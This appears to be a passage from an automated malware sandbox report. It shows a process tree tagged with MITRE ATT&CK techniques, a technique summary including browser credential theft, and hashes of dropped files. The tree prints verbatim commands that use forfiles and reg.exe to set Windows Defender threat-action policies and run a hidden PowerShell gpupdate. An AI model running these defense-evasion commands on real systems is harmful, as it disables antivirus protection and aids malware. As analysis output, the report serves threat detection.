C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3004 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1672 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:4532 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1384
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4124 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1924 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
PID:2068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:1832
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4956
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3436
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1KB
MD584e77a587d94307c0ac1357eb4d3d46f
SHA183cc900f9401f43d181207d64c5adba7a85edc1e
SHA256e16024b092a026a9dc00df69d4b9bbcab7b2dc178dc5291fc308a1abc9304a99
SHA512aefb5c62200b3ed97718d20a89990954d4d8acdc0a6a73c5a420f1bba619cb79e70c2cd0a579b9f52dc6b09e1de2cea6cd6cac4376cfee92d94e2c01d310f691
-
Filesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
Filesize
15KB
MD51ce61a5f99813dad04e8e12650bac10c
SHA114f9431757e27d2fc052ab999a4cb0a7e746539b
SHA256c9abc4657bac74ac842164b2257723495c5ed7a309f1b686108c570432e0eccc
SHA512b22150f001af0246eea9e680e46ae72d5d018d779a52276d955b287c1086f3430245c5c02b95c797d56e226618222b3d39fc2686ee887fd89d334302819cae49
-
Filesize
15KB
MD5d43854e5e607f9090310cbc4d795f351
SHA124f0e18d5b4b96ba3c0a0bddfc7cf838d2674d92
SHA256ea7a4b96eb986da1f7875c31ced3299fc516abe616b00a968982c01e7a42465b
SHA5126c642689f7b757dd5bc3b4bba1229d6d4653d04a454a7c2299068158b27f00623860b48196008c92e1269a003a995f23d76ece1beca802a101e04845f0862ed0
-
Filesize
416KB
MD56093bb59e7707afe20ca2d9b80327b49
SHA1fd599fa9d5ef5c980a445fc6c19efd1fcb80f2bc
SHA2563acc0b21db1f774d15a1f1d8080aff0b8f83eefb70c5c673f1c6ed7b676cd6d3
SHA512d28808686f73bcc13b8ad57c84585b9d55d1b6445807023897be45f229bcab89971fb320223772fa500a692ad0b6106eaa0b4cf35e807038a6050994106d18e1
-
Filesize
1.8MB
MD554a7169c7787b93f74b4bceb783cc91e
SHA168138ff9acd3eedb7a4c7dab8003e3c9770a8736
SHA2562efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8
SHA5127b37ea0392c0d063c9e2146e8a80765a95a44fac949190c8d290f35c7de3c99c01ad501e6e6ee361c95c0c2ed275bb45f937564cbeed2e60792bde4560604138
-
Filesize
319KB
MD50ec1f7cc17b6402cd2df150e0e5e92ca
SHA18405b9bf28accb6f1907fbe28d2536da4fba9fc9
SHA2564c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4
SHA5127caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861
-
Filesize
2.1MB
MD5224297950318b574eff66d8c5821816c
SHA1674ef31660964d23d4c4c9cd0ce28ab89ee772fc
SHA25608423614449782c59c3c61ca024b16bdb5da07b8d3c740123b131bd257d2ecc8
SHA5127d471f3793150b51fb2c64ff731986ccdb3337240bbeded09fe0bf8e44883a2e5857856babcffc47c0edb2a9b2d7022d23558727c1200b30aad3e24be8b9884c
-
Filesize
538KB
MD5913bdfccaaed0a1ed80d2c52e5f5d7c3
SHA19befba3d43ace45a777d2e936e1046e7a0fb634c
SHA25693e66ad3eea5b3217d9a016cb96951ab2dd0ae3f3ef6c2782667abacaaa8018f
SHA5121999d174e14b96ccb35dc8ffa2cc576aff9d01d9373654a2a0f78342735e8b637f605144f5c56e922dc5ee43afb82e62ab9f21e0ecfd33a1b8369344346f90e6
-
Filesize
941KB
MD5f5b93d3369d1ae23d6e150e75d2b6a80
SHA16f6914770748ad148154e1576d9c6fe6887f2290
SHA256343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81
SHA512dcedaed2df62386b980cc1957f224fc48224aeb0f5bf8d0241acc7a0a552b0ae90697ed333189963540f8391cbecfa0977a8685723c5025c9a4f95918032cf1e
-
Filesize
6.4MB
MD56d65c4b2b606c1bebf41a38e9859dffc
SHA1fa31536a99d8fd61f2db48060b973e560eab7915
SHA2560c4a1b1e7fbde64504de94d3ab2b034d816ff089709140b9391e6d158a5b8f7f
SHA51237f66944279bd8a5a04f2db7510b0282b154fc479a39e977aa811bbd19ccb26edf10ac048768d0e24959898db75e46f06b8c7e24cc8cac9b0051786c4a663868
-
Filesize
6.4MB
MD55fd3d1be090fc00290f60d25b45cfb97
SHA1ffe7ad8f8195bf9372ab85e22fc355d095280941
SHA256b86eab4824556b90b8454ca51d6618bd1e6594dadc0899b618d1fe0e13e48026
SHA51220fbc7b5c1b4d1deab10d602c3941a3b5694b296d1e8542701d6a36c9598afeeaa243b52e9f414565fed4c9c97276ae8f2ea7b6fd44a9d7b0db8814098b69e3f
-
Filesize
6.7MB
MD59e36a22f656dce8bcbc37ad0306b1159
SHA162cf001d7e5557a2b075ee6dbf3713a072843eac
SHA25665146311d12e4be1764bc83ad4a0c1dbfcca7e1a78800adfbb66b71270aefd7f
SHA512aac711a4091e2715964ccaf3cddd28a24b099ace134670409f016e766118ed38eb1418b0d43bd3392a2f5b212214df4586e558d18ecda57bc5961ea0e42aac05
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
510KB
MD574e358f24a40f37c8ffd7fa40d98683a
SHA17a330075e6ea3d871eaeefcecdeb1d2feb2fc202
SHA2560928c96b35cd4cc5887fb205731aa91eb68886b816bcc5ec151aeee81ce4f9a6
SHA5121525e07712c35111b56664e1589b1db37965995cc8e6d9b6f931fa38b0aa8e8347fc08b870d03573d10f0d597a2cd9db2598845c82b6c085f0df04f2a3b46eaf
-
Filesize
503KB
MD52c2be38fb507206d36dddb3d03096518
SHA1a16edb81610a080096376d998e5ddc3e4b54bbd6
SHA2560c7173daaa5ad8dabe7a2cde6dbd0eee1ca790071443aa13b01a1e731053491e
SHA512e436954d7d5b77feb32f200cc48cb01f94b449887443a1e75ebef2f6fa2139d989d65f5ea7a71f8562c3aae2fea4117efc87e8aae905e1ba466fbc8bb328b316
-
Filesize
7.3MB
MD512a864a73609e6a77c324aa84145511c
SHA1634b20b864e48579518cc6ffb64c1d569eac6ca9
SHA2567b13a67fad88c6e4b146fd306866a95f268a1b37fe849ba8b0594163ca80b5d1
SHA512be4d909d3a852a541a6d2c4788ef8d76375c41195a2dbb3517239cd7bd8640abc5c434523645cb3752dd90d8a9de1ec43ca7288832e588bcf81c8d8b34073e3f
-
Filesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
Filesize
250KB
MD5850a43e323656b86ae665d8b4fd71369
SHA1099d6e80c394ccc5233e1cbd6b29769da9e0e2aa
SHA256539423d2e436e198df15b5577d816dc306ba4c03b1362f7731e675b51f4a5f42
SHA5121f2778040e906ea2939a8b0a682e267599aa8422f81ea83bb6c980a304b569ad750ef3e81e1490edd5b1d74e734a2cb82f428f47096c55436037e03e516d2378
-
Filesize
2.9MB
MD5bc3e076ec6527a8bf74e9293be24630e
SHA12a58c06f16d1ba29e7f6945fd08896caa55df709
SHA25637b97e07cc1d88c49e382de22ce61ad6d684901114d475b96e2bc9645797903b
SHA5120dbf419d0652d143a36d4185d9b7ec2f35224b2467395826f55d53f538ef5539326bca03afa43676961c316de70b830f176a0056105d64f1205bf03fa84c4cf1
-
Filesize
7.3MB
MD5fc0ea27fc5ad5ea9a46f7c2614eb1a54
SHA1d1d371984e32810f460adbf1eb4b77bc7ff4b4e8
SHA2563ecb788cbbe51fda59cf562744eacc19972f3f2bde52a0e7b23ed42c3ce44aea
SHA512dfac9b921a5f745b991ce47bde7a8e37a4d9559d1ac21ac586257daee7a2f79f5f2f0d6c32b46d011463d7abf5018c02592b17e5cb1fcf4dbba85313c21394d1
-
Filesize
424B
MD5676c189cf4646ad021b0cbbab2b697f3
SHA136923a9f42288da3348e7ef370a2259e67b7652d
SHA2569fb710e1d1ec6cc250cb98de7d4b3eeb0db48812c7883683ff0b567115b25db8
SHA5123dcbbf693f08632e4df7fba5d6ce97db79b2a5bb12b7d85853a2b2cb30eb17a23db136dd8ce9e5f9abf13fab98f8cf1286d784dfd4f06721672f6c976f06858c